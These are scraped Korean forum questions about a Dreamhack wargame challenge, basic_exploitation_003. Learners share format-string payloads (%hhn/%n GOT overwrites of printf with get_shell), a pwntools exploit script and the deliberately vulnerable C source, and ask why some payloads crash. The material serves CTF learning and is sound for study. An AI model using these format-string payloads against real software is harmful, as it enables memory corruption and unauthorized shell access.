basic_exploitation_003

https://dreamhack.io/board/beta-feedback/129 그림이 첨부가 안되서 피드백 쪽에다 남겼는데 답변이 달리지 않아 다시 이곳에 올립니다 제가 어떤 부분을 착각하고 있는건지 알려주시면 감사하겠습니다 ㅠㅠ

풀이를 할 때, ` payload = "%p "*15 payload += p32(getshell) ` 이런식으로 작성하고 실행하니 쉘을 획득할 수 있었습니다. heap_buf의 크기는 0x80, stack_buf의 크기는 0x90이고 위의 페이로드에 작성한대로 실행하면 heap_buf에는 0xa0의 크기가 들어갑니다. 마찬가지로 stack_buf에도 0xa0의 크기가 들어가게되어 return 주소를 덮어 쓸 수 있는데 원인을 모르겠습니다...

basic_exploitation_002 처럼 바꿀 값의 주소를 처음 스택에 입력하고 해당 주소에 %n을 이용해 값을 입력하는 풀이를 사용해보았는데 sprintf에서 seg fault가 납니다. sprintf함수 에서 segfault가 나는 이유가 스택으로 복사된 문자열 ex) AAAA%2050c.... => 414141412020202020202020.... 이 너무 길어서 그런거라고 대충이해했는데, 너무 큰 값을 스택영역으로 옮기다보니, 그 값이 스택영역을 벗어나는 경우가 생겨 세그폴트가 났다.. 라고 이해해도 될까요?? 문제는 해결하였지만 basic_exploitation_002와 같은 방법으로는 풀이가 왜 불가능한지 여쭤보고싶습니다.

문제를 푸는 것은 성공했으나 그 과정과 관련해서 질문을 올리고자 합니다. 처음에는 이전 문제와 비슷하겠지 하고 다음과 같이 짰었습니다. shell1 = 0x69 shell2 = 0x86 shell3 = 0x04 shell4 = 0x08 payload = p32(printf_got) payload += p32(printf_got + 1) payload += p32(printf_got + 2) payload += p32(printf_got + 3) payload += ('%{}c'.format(shell1 - 16)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' payload += ('%{}c'.format(0x100 + shell3 - shell2)).encode() payload += b'%3$hhn' payload += ('%{}c'.format(0x100 + shell4 - shell3)).encode() payload += b'%4$hhn' 이렇게 짜인 페이로드를 보내보니 EOF로 쉘이 터져서 고민하다가 어차피 상위 2바이트는 printf와 get_shell이 똑같으니 하위 2바이트만 덮으면 되겠구나 싶어서 다시 아래처럼 고쳐서 다시 시도해보니 제대로 동작했습니다. shell1 = 0x69 shell2 = 0x86 payload = p32(printf_got) payload += p32(printf_got + 1) payload += ('%{}c'.format(shell1 - 8)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' 뭔가 느껴지는 건 첫 번째에서는 stack_buf의 크기를 넘어가버려서 터진건가 싶은데 확신이 없어서 이게 맞는건지, 아니면 다른 이유가 있는건지 궁금합니다.

payload = b'%105c%7$hhn' + b'%29c%8$hhnAAA' + p32(print_got) + p32(print_got+1) payload = p32(print_got) + p32(print_got+1) + b'%97c%1$hhn' + b'%29c%2$hhn' (1번)포맷스트링 + 주소의 경우에는 seg fault가 발생하고 (2번)주소 + 포맷스트링의 경우에는 print_got의 하위 2바이트가 정상적으로 덮어씌워졌습니다. 왜 동일한 코드(제가 생각하기에는요)인데 결과가 다르게 나오는지 궁금합니다.

basic-exploitation-002 에도 동일한 증상이 있습니다. 도저히 모르겠네요. 로컬에서 Ubuntu 16.04, x86을 설치해서 거기서 직접 binary를 실행해서 페이로드를 주입하면 gdb 상에서도 return address 교체가 되는 걸 볼수가 있는데 get_shell에 가기 전에 seg fault 발생하면서 죽습니다. 동일한 페이로드를 dreamhack 서버에 전달하면 shell을 획득합니다. basic-exploitation-002도 flag는 획득은했는데 로컬에서하면 Seg Fault로 죽네요. 이유가 뭘까요? 참고로 ./basic-exploitation-003 < input.bin 이렇게 실행했고 xxd input.bin 으로 확인했을때도 페이로드 잘 들어가있습니다.

sprintf 함수로 버퍼를 채운 뒤 ret address를 덮어 씌우는 방식을 많이 사용하시는 것 같은데, 저는 fsb의 정석(?) 대로 printf 의 got을 덮어 씌우는 방법을 사용했습니다. 다만, 여기서 의문 사항이 몇 가지 있어 질문 드립니다. 전체적인 페이로드는 아래와 같이 작성했습니다. pay = b'AAAA' pay += p32(overwrite+2) pay += p32(overwrite+1) pay += p32(overwrite) pay += p32(overwrite+3) pay += b'%85c%4$hhn' pay += b'%29c%3$hhn' pay += b'%126c%2$hhn' pay += b'%4c%hhn' fsb는 첫 번째 %p부터 발생하는 것을 확인하였습니다. 하지만 실제로 값을 넣어보면 dummy 값 4 byte 이후부터 값이 들어가는 것을 보았습니다. 왜 이런 것인가요? 위의 페이로드에서 보듯이, 삽입하는 주소 값이 순서대로가 아닌 +3 -> 0 -> +1 -> +2 로 삽입하여야 제대로 값이 들어가는 것을 확인하였습니다. 1항과 연계되어 발생하는 문제인 것 같긴한데... 왜 그런지 모르겠습니다.

ubuntu 16.04에 파이, 카나리 해제되어있는 문제입니다. #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void get_shell() { system("/bin/sh"); } int main(int argc, char *argv[]) { char *heap_buf = (char *)malloc(0x80); char stack_buf[0x90] = {}; initialize(); read(0, heap_buf, 0x80); sprintf(stack_buf, heap_buf); printf("ECHO : %s\n", stack_buf); return 0; } 아래와 같이 익스 코드를 작성했습니다. from pwn import * context.arch = "i386" context.log_level = 'debug' get_shell_addr = 0x0804867b #134514299 printf_plt = 0x8048460 printf_got = 0x804a010 libc_start_main = 0xf7e1b647 p = remote("host3.dreamhack.games", 20584) p = remote("localhost",----) sleep(5) print(proc.pid_by_name("docker_basic_exploitation_003")) pause() fstring = p32(printf_got) fstring += p32(printf_got+1) fstring += p32(printf_got+3) fstring += b'%111x%6$n%1035c%7$n%2946c%8$n' #앞에 4바이트 포함 p.sendline(fstring) pause() p.interactive() 이에 다음과 같이 got overwriting을 성공한 걸 볼 수 있습니다 got overwriting si로 진입하면 get_shell로 흐름이 바뀝니다. image.png 하지만 system("/bin/sh")에서 터집니다. image.png 로컬 디버거뿐만 아니라 원격지에서도 터지는 것을 보니 exploit code에 문제가 있는 것 같은데 이유를 잘 모르겠습니다. 도와주시면 감사하겠습니다..!

printf_got를 get_shell로 덮어서 문제를 푸려 하는데 fmtstr_payload만 재대로 먹지 않는 거 같은데 왜 그런지 알 수 있을까요 payload = fmtstr(1, {printf_got : get_shell}) 이런식으로 작성 했습니다.

제가 지식이 많이 짧아 기초적인 부분에서부터 막혀 풀이에 조금 어려움이 있었습니다. 해당 문제에 페이로드 구성 관련 질문중에 (질문 링크:https://dreamhack.io/forum/qna/2530/) "pay += b'%85c%4$hhn'에 의해 overwrite에 0x69 오버라이트함. 4$이므로 pay의 4 * 4번째에 있는 4바이트(overwrite)에다가 0x69를 오버라이트합니다." 라는 답변이 달려있었는데, 제가 이해하기로는 %85c%4hhn에서 4번째 인자가 있는 자리에 지금까지 출력된 문자열의 길이 만큼을 덮어씌운다고 알고있습니다. 그렇다면 %85c로 인하여 총 85개의 문자열, hex로는 0x55가 덮어씌워져야 될 것 같은데 어째서 0x69가 덮어씌워지는지 모르겠습니다. 또 다른 페이로드 구성 관련 질문 중에서도 (https://dreamhack.io/forum/qna/294/) 첫 번째 %hn 페이로드 : \x12\xa0\x04\x08\x10\xa0\x04\x08%2044c%1$hn%32357c%2$hn 두 번째 %hhn 페이로드 : \x10\xa0\x04\x08\x11\xa0\x04\x08%97c%1$hhn%29c%2$hhn 이렇게 페이로드를 각각 구성하신 분이 있는데 앞에 리틀엔디안으로 적힌 부분이 첫번째와 두번째 페이로드가 다른 것을 확인하였습니다. 저건 overwrite를 해야하는 주소로 알고있는데 해당 질문 작성자 분의 실수인지 아니면 다른 이유가 있는지 궁금하고, 마지막으로 같은 질문에서 두번재 페이로드는 작동한다고 들었는데, hhn은 1바이트로 알고있습니다. hhn으로 두번 덮어씌우기만 하면 총 2바이트만 덮어씌워질텐데 어떻게 작동하는지도 궁금합니다. 이런 부분도 디버거로 제가 직접 궁금증을 해결하고 싶은데 경험이 많이 없다보니 도와주시면 감사하겟습니다 ㅜㅜ